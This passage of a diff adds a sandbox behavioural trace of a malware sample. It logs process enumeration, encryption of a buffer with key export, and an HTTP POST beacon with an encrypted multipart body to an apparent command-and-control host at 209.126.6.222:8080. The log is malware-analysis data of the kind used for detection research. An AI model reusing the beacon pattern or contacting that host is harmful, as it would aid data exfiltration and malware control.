+ "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 1434 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 1435 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9512" + } + ], + "repeated": 0, + "id": 1436 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9600" + } + ], + "repeated": 0, + "id": 1437 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9688" + } + ], + "repeated": 0, + "id": 1438 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "9720" + } + ], + "repeated": 0, + "id": 1439 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "9756" + } + ], + "repeated": 0, + "id": 1440 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "OneDrive.exe" + }, + { + "name": "ProcessId", + "value": "9972" + } + ], + "repeated": 0, + "id": 1441 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeBackgroundHost.exe" + }, + { + "name": "ProcessId", + "value": "7352" + } + ], + "repeated": 0, + "id": 1442 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8568" + } + ], + "repeated": 0, + "id": 1443 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "7144" + } + ], + "repeated": 0, + "id": 1444 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5208" + } + ], + "repeated": 0, + "id": 1445 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "9936" + } + ], + "repeated": 0, + "id": 1446 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "VSSVC.exe" + }, + { + "name": "ProcessId", + "value": "9848" + } + ], + "repeated": 0, + "id": 1447 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "9892" + } + ], + "repeated": 0, + "id": 1448 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "2104" + } + ], + "repeated": 0, + "id": 1449 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "6720" + } + ], + "repeated": 0, + "id": 1450 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wuauclt.exe" + }, + { + "name": "ProcessId", + "value": "8104" + } + ], + "repeated": 0, + "id": 1451 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MpSigStub.exe" + }, + { + "name": "ProcessId", + "value": "9264" + } + ], + "repeated": 0, + "id": 1452 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "AM_Delta.exe" + }, + { + "name": "ProcessId", + "value": "8648" + } + ], + "repeated": 0, + "id": 1453 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": false, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1454 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce461b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000046c" + } + ], + "repeated": 0, + "id": 1455 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce2fe8", + "parentcaller": "0x03ce14ae", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x052c2000" + }, + { + "name": "RegionSize", + "value": "0x00041000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1456 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce1bde", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "CryptHash", + "value": "0x04e24740" + }, + { + "name": "Buffer", + "value": "[\\x1b\\x96 Y\\xed\\xaa\\xa8$\\x9fz\\xe5\t\\xd1]?\\xaf&\\xc3*-\\x154!\\x80\\xb7\\x83\\x14k\\x0f\\x98n\\xce!\\xcf\\xa9\\xc2c\\x02\\x06\\xe5/\\x81\\x8aU\\xdf\\x81X\\x13\\x95\\xf90\\xde\"E\\x8d\\xc7\\x91\\xa4\\x0fOq\\xcaW\\xcdP\\xadN\\x8f\\xbc\\xc9z\\x8d\\xe7\\xb2Q\\x1et\\x8d&\\x926\\xc5X\\xb1\\x8a\\xd8fX\\x84\\x9d\\xc3\\x1e\\xab\\\\xd9\\xa9'Q\\x8eh\\xab\\x11\\x1bY\\xaef\\x10\\xf3b\\xb8\\xf1\\x8bh\\xa3\\xbe2\\x0f<\\xae\\xa2\\xb0<\\xfdi\\x06\\x9c6\\xc4\\xa0\\xc9QiM\\xdd\\xbf\\x93\\xa3\\x00-\\x11VpB\\xa1r\\x0c-\\x84\\x8c\\xfb\\xfb\\x9a\\xc3T{\\x84\\xc4\\xae\\xc6)s%\\xc8\\xbf\\xf3p\\xd7\\xd8\\xc1\\xb3\\xf5/\\xf9\\xd7\\xee\\x97S,\\x11\\xcc\\xd2\\x8b\\xf9TV\\xccbJ1~\\x00\\xace-7\\x84\\xbd\t/qox\\x87\\x8f\\xf5\\x94\\xc2\\x87\\x9b[\\x8c3\\x10E\\x86\\xe1].\\xe1\\xcd\\xcd\\x1d\\x8f\\xf6m\"\\x8a\\x98\\xb2\\x95\\xbd\"\\xdc\\xa7\\xb7\\xf5\\xd5rn\\xfd\\xee\\xdd\\xdd>\\x10\\xd0\\xbf|\\x02\\xcd=\\x91\\xa6\\xef\\x97" + }, + { + "name": "Length", + "value": "704" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 1457 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00m\\xe4R\\x18\\x8f\\xb9\\xc2\\x13\\x90XwL\\xf4\\x86\\x05vC\\xd8Nr6\\x06o\\xcb\\xd8?\\xfc\\xcd\\x7f\\xf2E\\xfa\\x06\\x17\\xaaJ;?P\\xcdAW#[\\xb5\\x0bS\\xbc\\x08)\\xf41\\xac\\xb0q@\\xa9L\\x1f\\xad\rX\\x7f\\x80\\x9c\\xb1\\x06\\x80\\xe2>\\xe1\\x9fD\\xf4v\\x15\\xc7}nb\\xc2]\\xcfz\\xcb\\x92b\\x9e\\xee\\x8a\\xbd\nL\\x1b_\\xca" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 1458 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e24740" + } + ], + "repeated": 0, + "id": 1459 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 1460 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 1461 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1462 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "209.126.6.222" + }, + { + "name": "ServerPort", + "value": "8080" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1463 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "XVp1VqQDpvpVag9d/wQMRF0guzD/S26EMjo4ceGc4xTOH/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 1464 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 1465 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "6332", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x0529ca78" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "\\x90\\xa3)\\x05" + } + ], + "repeated": 0, + "id": 1466 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 1467 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003d8" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1468 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d8" + } + ], + "repeated": 0, + "id": 1469 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d4" + } + ], + "repeated": 0, + "id": 1470 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7335d6d6", + "parentcaller": "0x7338784c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1471 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004cc" + } + ], + "repeated": 0, + "id": 1472 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 1473 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003d8" + } + ], + "repeated": 0, + "id": 1474 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000408" + } + ], + "repeated": 0, + "id": 1475 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7332ed40", + "parentcaller": "0x7332e70d", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "209.126.6.222" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 1476 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x00000408", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1032" + } + ], + "repeated": 0, + "id": 1477 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000408" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1478 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000408" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x00\\x42e*\\x05" + } + ], + "repeated": 0, + "id": 1479 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1032" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 1480 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000408" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc3\\xec\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1481 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1032" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1482 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000408" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3W\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1483 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000408" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3W\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1484 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1032" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 1485 + }, + { + "timestamp": "2025-03-07 22:33:51,250", + "thread_id": "6332", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1032" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "209.126.6.222" + }, + { + "name": "port", + "value": "8080" + } + ], + "repeated": 0, + "id": 1486 + }, + { + "timestamp": "2025-03-07 22:34:08,172", + "thread_id": "10108", + "caller": "0x7705b596", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "12" + }, + { + "name": "ThreadInformation", + "value": "\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "10108" + } + ], + "repeated": 0, + "id": 1487 + }, + { + "timestamp": "2025-03-07 22:34:08,172", + "thread_id": "10108", + "caller": "0x7705b5b9", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtTerminateThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x00000000" + }, + { + "name": "ExitStatus", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "0" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1488 + }, + { + "timestamp": "2025-03-07 22:34:08,172", + "thread_id": "10104", + "caller": "0x7705b596", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "12" + }, + { + "name": "ThreadInformation", + "value": "\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "10104" + } + ], + "repeated": 0, + "id": 1489 + }, + { + "timestamp": "2025-03-07 22:34:08,172", + "thread_id": "10104", + "caller": "0x7705b5b9", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtTerminateThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x00000000" + }, + { + "name": "ExitStatus", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "0" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1490 + }, + { + "timestamp": "2025-03-07 22:34:08,172", + "thread_id": "10100", + "caller": "0x7705b596", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "12" + }, + { + "name": "ThreadInformation", + "value": "\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "10100" + } + ], + "repeated": 0, + "id": 1491 + }, + { + "timestamp": "2025-03-07 22:34:08,172", + "thread_id": "10100", + "caller": "0x7705b5b9", + "parentcaller": "0x770260ac", + "category": "threading", + "api": "NtTerminateThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x00000000" + }, + { + "name": "ExitStatus", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "0" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 1492 + }, + { + "timestamp": "2025-03-07 22:34:09,344", + "thread_id": "8036", + "caller": "0x7511cf78", + "parentcaller": "0x7511ce2d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002cc" + } + ], + "repeated": 0, + "id": 1493 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "8196", + "caller": "0x756c7924", + "parentcaller": "0x7553f81d", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x000002cc" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 1494 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "8196", + "caller": "0x7335afe3", + "parentcaller": "0x756dd613", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 1495 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "8196", + "caller": "0x73389bd2", + "parentcaller": "0x7332eeb2", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1032" + } + ], + "repeated": 0, + "id": 1496 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "8196", + "caller": "0x733cc064", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 1497 + }, + { + "timestamp": "2025-03-07 22:34:12,641", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpSendRequestW", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "RequestHandle", + "value": "0x00cc000c" + }, + { + "name": "Headers", + "value": "Referer: http://209.126.6.222/XVp1VqQDpvpVag9d/wQMRF0guzD/S26EMjo4ceGc4xTOH/\r\nContent-Type: multipart/form-data; boundary=---------------------------838661518308651\r\n" + }, + { + "name": "PostData", + "value": "\r\n-----------------------------838661518308651\r\nContent-Disposition: form-data; 